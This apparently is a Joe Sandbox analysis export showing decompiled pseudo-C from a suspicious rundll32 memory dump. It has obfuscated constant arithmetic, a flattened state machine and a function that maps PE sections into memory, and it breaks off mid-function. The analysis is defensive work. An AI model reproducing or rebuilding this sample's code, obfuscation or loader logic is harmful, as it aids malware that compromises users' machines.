Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
API String ID: 0-964951681
Opcode ID: cf2f6cc7ff951b99f6350592d21d21d827c5738e7017695800310d92fffe3538
Instruction ID: 7c671332968b6f5ce3c5f3651cc25833ce719fc834bb3991f9ee661cd3207283
Opcode Fuzzy Hash: cf2f6cc7ff951b99f6350592d21d21d827c5738e7017695800310d92fffe3538
Instruction Fuzzy Hash: B902507260D3818FE368CF25D54AA4BFBE1BBC4708F50891DF1A9862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024E377, Relevance: 15.3, Strings: 12, Instructions: 321
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E0024F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00248736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E0024B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00253E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E002428CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00256319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x25ca30; // 0x0
							E00258A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00248624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00254F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

0x0024e37d
0x0024e38a
0x0024e393
0x0024e39a
0x0024e39f
0x0024e3a7
0x0024e3ac
0x0024e3b4
0x0024e3bc
0x0024e3c4
0x0024e3c9
0x0024e3d1
0x0024e3d6
0x0024e3de
0x0024e3e6
0x0024e3f6
0x0024e401
0x0024e404
0x0024e408
0x0024e410
0x0024e418
0x0024e41d
0x0024e425
0x0024e42d
0x0024e435
0x0024e43d
0x0024e442
0x0024e44a
0x0024e452
0x0024e45a
0x0024e467
0x0024e46b
0x0024e473
0x0024e47b
0x0024e483
0x0024e48b
0x0024e493
0x0024e49b
0x0024e4a8
0x0024e4ac
0x0024e4b4
0x0024e4c4
0x0024e4c8
0x0024e4d0
0x0024e4d8
0x0024e4e0
0x0024e4e8
0x0024e4f0
0x0024e4f8
0x0024e500
0x0024e505
0x0024e50d
0x0024e515
0x0024e521
0x0024e524
0x0024e528
0x0024e530
0x0024e53b
0x0024e546
0x0024e551
0x0024e559
0x0024e55e
0x0024e563
0x0024e56b
0x0024e573
0x0024e57d
0x0024e582
0x0024e58a
0x0024e592
0x0024e597
0x0024e59f
0x0024e5a7
0x0024e5af
0x0024e5b7
0x0024e5bf
0x0024e5c7
0x0024e5cf
0x0024e5d7
0x0024e5df
0x0024e5e7
0x0024e5ef
0x0024e5f7
0x0024e5ff
0x0024e607
0x0024e60f
0x0024e61e
0x0024e61f
0x0024e629
0x0024e62d
0x0024e635
0x0024e63d
0x0024e645
0x0024e64d
0x0024e655
0x0024e668
0x0024e66f
0x0024e67a
0x0024e682
0x0024e68a
0x0024e68f
0x0024e697
0x0024e69f
0x0024e6a4
0x0024e6ac
0x0024e6bf
0x0024e6c6
0x0024e6d1
0x0024e6dc
0x0024e6e7
0x0024e6f2
0x0024e6fa
0x0024e6ff
0x0024e707
0x0024e712
0x0024e71d
0x0024e728
0x0024e730
0x0024e738
0x0024e73d
0x0024e742
0x0024e74a
0x0024e752
0x0024e75a
0x0024e75f
0x0024e767
0x0024e77a
0x0024e781
0x0024e78c
0x0024e799
0x0024e79d
0x0024e7a5
0x0024e7ad
0x0024e7b5
0x0024e7bd
0x0024e7c5
0x0024e7cd
0x0024e7d5
0x0024e7da
0x0024e7e4
0x0024e7eb
0x0024e7f2
0x0024e7f9
0x0024e7fd
0x0024e805
0x0024e817
0x0024ea0c
0x0024ea13
0x00000000
0x0024ea13
0x0024e823
0x0024e9d2
0x0024e9d3
0x0024e9d9
0x0024e9ea
0x0024e9ed
0x0024e9f4
0x00000000
0x0024e9f4
0x0024e82f
0x0024e9a9
0x0024e9ae
0x0024e9b0
0x0024e9b3
0x0024e9b6
0x0024ea3d
0x0024ea40
0x0024ea49
0x0024ea49
0x0024e9bc
0x00000000
0x0024e9bc
0x0024e83b
0x0024e93e
0x0024e952
0x0024e957
0x0024e959
0x0024e95e
0x0024e963
0x00000000
0x0024e963
0x0024e847
0x0024e925
0x00000000
0x0024e925
0x0024e84f
0x0024ea31
0x0024ea31
0x0024ea37
0x00000000
0x00000000
0x00000000
0x0024ea37
0x0024e88c
0x0024e891
0x0024e896
0x0024e8cf
0x0024e8e4
0x0024e8e4
0x0024e8e6
0x0024e91e
0x0024e8e8
0x0024e8ef
0x0024e90c
0x0024e911
0x0024e914
0x0024e914
0x00000000
0x0024e8e6
0x0024e898
0x0024e89a
0x0024e8b9
0x0024e8bd
0x0024e8d8
0x0024e8df
0x0024e8df
0x00000000
0x0024e8df
0x0024e8bf
0x0024e8bf
0x0024e8c5
0x0024e8c6
0x00000000
0x0024e8c6
0x0024ea26
0x0024ea2c
0x00000000

Strings

|E, xrefs: 0024E5AF
w]4S, xrefs: 0024E56B
&!, xrefs: 0024E74A
^, xrefs: 0024E59F
M:, xrefs: 0024E505
h|, xrefs: 0024E483
ve(, xrefs: 0024E7DA
n`, xrefs: 0024E44A
o, xrefs: 0024E712
ve(, xrefs: 0024E8DF
HH, xrefs: 0024E7AD
?, xrefs: 0024E6E7

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
API String ID: 823142352-1348462970
Opcode ID: 78eebcc4842ebbe5faaea608920eff7c6007b7b8075b8af8fd909fb07d1be1cc
Instruction ID: 8351d97c2a9c068d56d331ee927e17f982bab9c1bdbeffb8cd231b2a6a88766a
Opcode Fuzzy Hash: 78eebcc4842ebbe5faaea608920eff7c6007b7b8075b8af8fd909fb07d1be1cc
Instruction Fuzzy Hash: 1FF12E715183819FE7A8CF25C54AA5FBBF1BBC5708F108A1DE1DA862A0D7B58919CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00256DB9, Relevance: 15.2, Strings: 12, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00256DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E0024602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00253811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00247EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00252674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00252674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E0024F7D8(_t295, _t256);
				_t264 = _t295;
				if(E0024E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00254FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}

0x00256dbe
0x00256dc5
0x00256dcc
0x00256dd3
0x00256dda
0x00256ddc
0x00256dde
0x00256ddf
0x00256de4
0x00256dee
0x00256df9
0x00256e08
0x00256e0b
0x00256e0f
0x00256e17
0x00256e1f
0x00256e27
0x00256e2c
0x00256e31
0x00256e39
0x00256e41
0x00256e49
0x00256e51
0x00256e59
0x00256e61
0x00256e71
0x00256e75
0x00256e7d
0x00256e85
0x00256e8d
0x00256e95
0x00256e9d
0x00256ea5
0x00256eaa
0x00256eb2
0x00256eb6
0x00256ebe
0x00256ec6
0x00256ece
0x00256ed6
0x00256ede
0x00256eeb
0x00256eec
0x00256ef0
0x00256ef4
0x00256efc
0x00256f04
0x00256f0c
0x00256f14
0x00256f21
0x00256f25
0x00256f2a
0x00256f32
0x00256f3a
0x00256f3f
0x00256f47
0x00256f4f
0x00256f57
0x00256f5f
0x00256f67
0x00256f6f
0x00256f74
0x00256f7c
0x00256f8a
0x00256f8e
0x00256f96
0x00256fa3
0x00256fa7
0x00256fb1
0x00256fb6
0x00256fbe
0x00256fc6
0x00256fce
0x00256fd6
0x00256fe4
0x00256fe9
0x00256fef
0x00256ff7
0x00257004
0x00257007
0x0025700b
0x00257013
0x00257018
0x00257020
0x0025702d
0x00257031
0x0025703c
0x0025703d
0x00257043
0x0025704b
0x00257053
0x00257060
0x00257064
0x0025706c
0x00257077
0x0025707f
0x0025708a
0x00257092
0x0025709a
0x002570a2
0x002570aa
0x002570b5
0x002570b9
0x002570be
0x002570c6
0x002570ce
0x002570d6
0x002570f5
0x002570fa
0x002570fc
0x00257101
0x002571ee
0x002571ee
0x0025712d
0x0025712f
0x00257134
0x002571e7
0x00000000
0x002571e7
0x00257157
0x00257160
0x0025716d
0x0025716f
0x002571aa
0x0025718d
0x0025719f
0x002571a4
0x002571a7
0x002571a7
0x002571b2
0x002571b9
0x002571c4
0x002571c6
0x002571dd
0x002571e5
0x002571e5
0x00000000

Strings

"t, xrefs: 00256E39
R), xrefs: 0025709A
P, xrefs: 00256E1F
2!, xrefs: 00256FEF
z, xrefs: 00257020
,, xrefs: 00256EFC
ei, xrefs: 00256E95
2U, xrefs: 00256E75
IB, xrefs: 002570A2
2, xrefs: 00256F96
?s, xrefs: 0025706C
om, xrefs: 00256FD6

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
API String ID: 0-3377435326
Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction ID: aa6a52d15da22de9588d18acb3ac4a7362470903c2864ca39b3e831f0a01767b
Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction Fuzzy Hash: 62B123725187809FE364CF25C88A90BFBF1BBC4358F508A1CF695862A0C7B9C559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00246D9F, Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00246D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
